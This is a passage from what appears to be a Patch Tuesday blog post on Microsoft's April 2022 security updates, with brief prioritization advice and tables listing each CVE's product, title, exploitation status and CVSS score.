[CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>)); Windows SMB Client ([CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>), [CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>)); Windows Network File System ([CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>)); LDAP ([CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>)); Microsoft Dynamics ([CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>)); and the Windows RPC Runtime ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>)).\n\nOn the Office side of the house, Skype for Business Server was patched for spoofing ([CVE-2022-26910](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26910>)) and information disclosure ([CVE-2022-26911](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26911>)) vulnerabilities. Two RCEs affecting Excel ([CVE-2022-24473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24473>) and [CVE-2022-26901](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26901>)) were fixed, as well as a spoofing vulnerability in SharePoint Server ([CVE-2022-24472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24472>)).\n\nWith so many vulnerabilities to manage, it can be difficult to prioritize. Thankfully, most of this month\u2019s CVEs can be addressed by patching the core OS. Administrators should first focus on updating any public-facing servers before moving on to internal servers and then client systems. The SMB Client vulnerabilities can also be mitigated by blocking port 445/tcp at the network perimeter \u2013 victims need to be enticed to connect to a malicious SMB server, and this would help against Internet-based attackers. Of course, this won\u2019t help much if the malicious system was set up within the perimeter.\n\nFor any readers who enjoy deeper dives into vulnerabilities and exploits, Rapid7\u2019s Jake Baines has a [technical writeup](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>) of [CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>), an LPE he discovered in the Connected Cache component of Microsoft Endpoint Manager that got fixed today. Check it out!\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26898>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26896>) | Azure Site Recovery Information Disclosure Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26897>) | Azure Site Recovery Information Disclosure Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-26907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26907>) | Azure SDK for .NET Information Disclosure Vulnerability | No | No | 5.3 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24523>) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 4.3 | Yes \n[CVE-2022-24475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24475>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26891>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26894>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26895>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26900>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26908>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26909](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26909>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26912>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-1232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1232>) | Chromium: CVE-2022-1232 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2022-1146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1146>) | Chromium: CVE-2022-1146 Inappropriate implementation in Resource Timing | No | No | N/A | Yes \n[CVE-2022-1145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1145>) | Chromium: CVE-2022-1145 Use after free in Extensions | No | No | N/A | Yes \n[CVE-2022-1143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1143>) | Chromium: CVE-2022-1143 Heap buffer overflow in WebUI | No | No | N/A | Yes \n[CVE-2022-1139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1139>) | Chromium: CVE-2022-1139 Inappropriate implementation in Background Fetch API | No | No | N/A | Yes \n[CVE-2022-1138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1138>) | Chromium: CVE-2022-1138 Inappropriate implementation in Web Cursor | No | No | N/A | Yes \n[CVE-2022-1137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1137>) | Chromium: CVE-2022-1137 Inappropriate implementation in Extensions | No | No | N/A | Yes \n[CVE-2022-1136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1136>) | Chromium: CVE-2022-1136 Use after free in Tab Strip | No | No | N/A | Yes \n[CVE-2022-1135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1135>) | Chromium: CVE-2022-1135 Use after free in Shopping Cart | No | No | N/A | Yes \n[CVE-2022-1134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1134>) | Chromium: CVE-2022-1134 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2022-1133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1133>) | Chromium: CVE-2022-1133 Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2022-1131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1131>) | Chromium: CVE-2022-1131 Use after free in Cast UI | No | No | N/A | Yes \n[CVE-2022-1130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1130>) | Chromium: CVE-2022-1130 Insufficient validation of untrusted input in WebOTP | No | No | N/A | Yes \n[CVE-2022-1129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1129>) | Chromium: CVE-2022-1129 Inappropriate implementation in Full Screen Mode | No | No | N/A | Yes \n[CVE-2022-1128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1128>) | Chromium: CVE-2022-1128 Inappropriate implementation in Web Share API | No | No | N/A | Yes \n[CVE-2022-1127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1127>) | Chromium: CVE-2022-1127 Use after free in QR Code Generator | No | No | N/A | Yes \n[CVE-2022-1125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1125>) | Chromium: CVE-2022-1125 Use after free in Portals | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26924>) | YARP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24513>) | Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26921>) | Visual Studio Code Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2022-24765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24765>) | GitHub: Uncontrolled search for the Git directory in Git for Windows | No | No | N/A | Yes \n[CVE-2022-24767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24767>) | GitHub: Git for Windows' uninstaller vulnerable to DLL hijacking when run under the SYSTEM user account | No | No | N/A | Yes \n[CVE-2022-26832](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26832>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-23259](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23259>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26910>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-26911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26911>) | Skype for Business Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-24472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24472>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2022-24473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24473>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26901>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### SQL Server Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-23292](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23292>) | Microsoft Power BI Spoofing Vulnerability | No | No | 5.9 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24548>) | Microsoft Defender Denial of Service Vulnerability | No | No | 5.5 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24543>) | Windows Upgrade Assistant Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24550](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24550>) | Windows Telephony Server Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26786>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26789](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26789>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26791>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26793>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26795>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24491>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24497>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24487>) | Windows Local Security Authority (LSA) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-24483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24483>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-24545](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24545>) | Windows Kerberos Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-24486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24486>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24490>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-24539](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24539>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-26783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26783>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26785>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-23257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23257>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-22008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22008>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24537>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-22009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22009>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-23268](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23268>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26920>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-26808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26808>) | Windows File Explorer Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24495](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24495>) | Windows Direct Show - Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2022-24547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24547>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24488>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24546](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24546>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26811>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26823](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26823>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26824>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26825](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26825>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26826](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26826>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26814>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26817](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26817>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26818](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26818>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26816>) | Windows DNS Server Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-24538](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24538>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-26784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26784>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-24484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24484>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2022-26828](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26828>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24549>) | Windows AppX Package Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24482>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26914>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26788>) | PowerShell Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24496>) | Local Security Authority (LSA) Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24532>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26830>) | DiskUsage.exe Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24479>) | Connected User Experiences and Telemetry Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24489>) | Cluster Client Failover (CCF) Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24498>) | Windows iSCSI Target Service Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26807>) | Windows Work Folder Service Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24474>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24542](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24542>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26904>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | Yes \n[CVE-2022-24541](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24541>) | Windows Server Service Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-26915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26915>) | Windows Secure Channel Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-24500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24500>) | Windows SMB Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-26787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26787>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26790>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26792>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26794>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26796>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26797>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26798>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26801](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26801>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26802>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26803>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26919>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-26831](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26831>) | Windows LDAP Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-24544](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24544>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24530>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24499>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26903>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26810>) | Windows File Server Resource Management Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26827>) | Windows File Server Resource Management Service Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26916>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26917>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26918>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24527>) | Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26812>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26813>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-24536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24536>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26815](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26815>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26819>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26820](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26820>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26821>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26822>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26829](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26829>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-24521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24521>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2022-24481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24481>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24494>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24540](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24540>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21983>) | Win32 Stream Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24534>) | Win32 Stream Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24485>) | Win32 